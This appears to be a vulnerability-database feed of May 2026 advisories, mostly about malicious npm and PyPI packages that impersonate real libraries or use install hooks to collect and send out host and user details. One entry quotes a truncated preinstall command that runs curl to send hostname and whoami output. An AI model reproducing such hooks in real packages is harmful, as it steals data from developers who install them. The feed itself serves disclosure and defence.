
OSV (added 2026/05/25 1:48 p.m., 6 views)

MAL-2026-4589 Malicious code in itc-actors-api (npm)

Source: amazon-inspector 22687e1f7601dde1753d3775925d62d040892631394937e56e9b9fba74fb85c6. The package contains callback.js which collects host identifiers and user information os.hostname, os.userInfo, os.platform, cwd and transmits them v...

AI score: 5.8. Exploits: 0. References: 1.
OSSF Malicious Packages (added 2026/05/25 10:36 a.m., 12 views)

Malicious code in muaddib-scanner (npm)

Source: amazon-inspector c8eea5d3ed390c4c82b5bfa89ac220f1d424fcaebe70fe71bbbe3bce66f0f48f. package.json declares "loadash": "^1.0.0" as a runtime dependency. loadash is a well-known typosquat of lodash and is never required or imported...

AI score: 5.8. Exploits: 0. References: 1.
OSV (added 2026/05/25 10:36 a.m., 9 views)

MAL-2026-4616 Malicious code in muaddib-scanner (npm)

Source: amazon-inspector c8eea5d3ed390c4c82b5bfa89ac220f1d424fcaebe70fe71bbbe3bce66f0f48f. package.json declares "loadash": "^1.0.0" as a runtime dependency. loadash is a well-known typosquat of lodash and is never required or imported...

AI score: 5.8. Exploits: 0. References: 1.
OSV (added 2026/05/25 10:31 a.m., 5 views)

MAL-2026-4631 Malicious code in opentiny-react (npm)

Source: amazon-inspector 70307cffed06951bdb7b961e7846e3b3e0ba660b75ddca0b4fa11366ab94dc6d. The package opentiny-react reproduces the source, README, and CHANGELOG of the legitimate @tinymce/tinymce-react integration verbatim under a...

AI score: 6. Exploits: 0. References: 1.
vulnersOsv (added 2026/05/24 7:39 a.m., 5 views)

org.webjars.npm:coreui__coreui (=4.2.1), org.webjars.npm:css-loader (>=2.1.0 <=6.7.2) +19 more potentially affected by CVE-2026-9358 via org.webjars.npm:postcss-selector-parser (>=4.0.0-rc.1 <=7.1.0)

org.webjars.npm:postcss-selector-parser (Maven), versions =4.0.0-rc.1, =2.1.0, =3.1.0, =7.0.1, =4.0.2, =2.0.6, =2.1.0, =4.1.2, =6.2.0 and more. Source CVEs: CVE-2026-9358. Source advisory: SNYK:JAVA-ORGWEBJARSNPM-16873883...

CVSS: 5.3. AI score: 5.4. EPSS: 0.00325. Exploits: 0.
OSV (added 2026/05/23 7:14 p.m., 7 views)

MAL-2026-4750 Malicious code in fastapi (PyPI)

Source: amazon-inspector a753fd569a7bb908b7cdf82fe0228dc0e24dcc253b67993af5dd5c30b61f4411. This release of fastapi 0.136.3 modifies pyproject.toml and PKG-INFO to add an undocumented dependency 'fastar=0.9.0' to the...

AI score: 6.2. Exploits: 0. References: 1.
OSSF Malicious Packages (added 2026/05/23 7:14 p.m., 17 views)

Malicious code in fastapi (PyPI)

Source: amazon-inspector a753fd569a7bb908b7cdf82fe0228dc0e24dcc253b67993af5dd5c30b61f4411. This release of fastapi 0.136.3 modifies pyproject.toml and PKG-INFO to add an undocumented dependency 'fastar=0.9.0' to the...

AI score: 6.2. Exploits: 0. References: 1.
OSV (added 2026/05/23 6:19 p.m., 9 views)

MAL-2026-4638 Malicious code in pewter-constantstest (npm)

Source: amazon-inspector 050b19d8dad7c8c1a626c953493c23b375e434128f38950625f82b0fb244eabe. On npm install, the preinstall script callback.js collects the installer's hostname, OS username, current working directory, npm registry...

AI score: 5.8. Exploits: 0. References: 1.
OSSF Malicious Packages (added 2026/05/23 10:27 a.m., 9 views)

Malicious code in @onerjs/inspector (npm)

Source: amazon-inspector 08c3c6c201db840a5576941656934704b0932abe72527c5e85b969fd90ad0ccd. Package name, version 8.52.2, README, homepage and repository all impersonate @babylonjs/inspector. The shipped code is a 700-byte UMD wrapper that...

AI score: 6. Exploits: 0. References: 1.
OSV (added 2026/05/23 4:1 a.m., 6 views)

MAL-2026-4410 Malicious code in @onerjs/addons (npm)

Source: amazon-inspector a7d3b8a435a56ca78d7a2f4ca7077b8a96f968d29e32dd01580fdf01cee442f5. Package is published as @onerjs/addons but ships a verbatim copy of @babylonjs/addons source while declaring Babylon.js identity in its metadata:...

AI score: 6. Exploits: 0. References: 2.
OSSF Malicious Packages (added 2026/05/23 4:1 a.m., 12 views)

Malicious code in @onerjs/addons (npm)

Source: amazon-inspector a7d3b8a435a56ca78d7a2f4ca7077b8a96f968d29e32dd01580fdf01cee442f5. Package is published as @onerjs/addons but ships a verbatim copy of @babylonjs/addons source while declaring Babylon.js identity in its metadata:...

AI score: 6. Exploits: 0. References: 2.
OSSF Malicious Packages (added 2026/05/23 2:17 a.m., 13 views)

Malicious code in dds-js-idl-types (npm)

Source: amazon-inspector 68e8941c301603919022f1d67d311d576d5d5efcac7ed7cb0d3526cb71e829d6. On npm install, the package's postinstall.js runs whoami and reads os.hostname, os.platform, the current working directory, and CI-related environmen...

AI score: 5.8. Exploits: 0. References: 2.
Fedora (added 2026/05/23 12:58 a.m., 24 views)

[SECURITY] Fedora 44 Update: composer-2.9.8-1.fc44

Composer helps you declare, manage and install dependencies of PHP projects, ensuring you have the right stack everywhere. Documentation: https://getcomposer.org/doc/...

AI score: 5.8. Exploits: 0.
vulnersOsv (added 2026/05/23 12:0 a.m., 6 views)

ai.aletyx.kogito:aletyx-kogito-ai-addons-springboot-adhoc-subprocess (>=0.1.0 <=0.2.0), ai.aletyx.kogito:aletyx-kogito-ai-addons-springboot-adhoc-subprocess-storage-jpa (>=0.1.0 <=0.2.0) +59 more potentially affected by CVE-2026-41863 via org.springframework.ai:spring-ai-anthropic (>=1.0.0-M5 <=1.1.6)

org.springframework.ai:spring-ai-anthropic (Maven), versions =1.0.0-M5, =0.1.0, =0.1.0, =1.0.0, =1.0.0, =1.0.0, =1.0.0, =1.0.24, =1.0.27, =1.0.0, =1.0.0, =1.0.0, =1.0.0, =1.2.4, =1.2.4, =1.2.6 and more. Source CVEs: CVE-2026-41863. Source advisory: SNYK:JAVA-ORGSPRINGFRAMEWORKAI-16873885...

CVSS: 6.5. AI score: 5.7. EPSS: 0.00398. Exploits: 0.
OSV (added 2026/05/22 7:52 p.m., 10 views)

MAL-2026-4639 Malicious code in pg-expense-example (npm)

Source: amazon-inspector d1d939ad3f0e8e9754bf3562f06692713a76d5c0f18ac13c956f9cb199ed0fbf. On require/load, index.js unconditionally collects host identifiers hostname, username, platform, arch, cwd, pid and sends them as URL query paramete...

AI score: 5.9. Exploits: 0. References: 1.
OSV (added 2026/05/22 7:36 p.m., 7 views)

MAL-2026-4632 Malicious code in orca-website (npm)

Source: amazon-inspector c52f7fe46d56cb45880942f5266494a2654d9d330914a6c3c99f02045eacd1dc. On require/import, index.js collects host identifiers os.hostname, os.userInfo.username, os.platform, os.arch, process.cwd, process.pid, timestamp an...

AI score: 5.8. Exploits: 0. References: 1.
OSSF Malicious Packages (added 2026/05/22 6:36 p.m., 12 views)

Malicious code in express-enrouten-async (npm)

Source: amazon-inspector f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e. Package name mimics the legitimate express-enrouten route-discovery library, but the shipped index.js only hardcodes two demo routes rather than...

AI score: 6.1. Exploits: 0. References: 2.
OSV (added 2026/05/22 6:36 p.m., 7 views)

MAL-2026-4556 Malicious code in express-enrouten-async (npm)

Source: amazon-inspector f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e. Package name mimics the legitimate express-enrouten route-discovery library, but the shipped index.js only hardcodes two demo routes rather than...

AI score: 6.1. Exploits: 0. References: 2.
OSSF Malicious Packages (added 2026/05/22 6:12 p.m., 12 views)

Malicious code in mmt-static (npm)

Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300. On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...

AI score: 5.8. Exploits: 0. References: 2.
Snyk (added 2026/05/22 5:42 p.m., 8 views)

Improper Authentication

Overview: Affected versions of this package are vulnerable to Improper Authentication via the ToASCII and ToUnicode functions. An attacker can bypass hostname validation by submitting Punycode-encoded labels that decode to ASCII-only labels, potentially leading to privilege escalation in...

CVSS: 9.6. AI score: 5.6. EPSS: 0.00478. Exploits: 0. References: 2.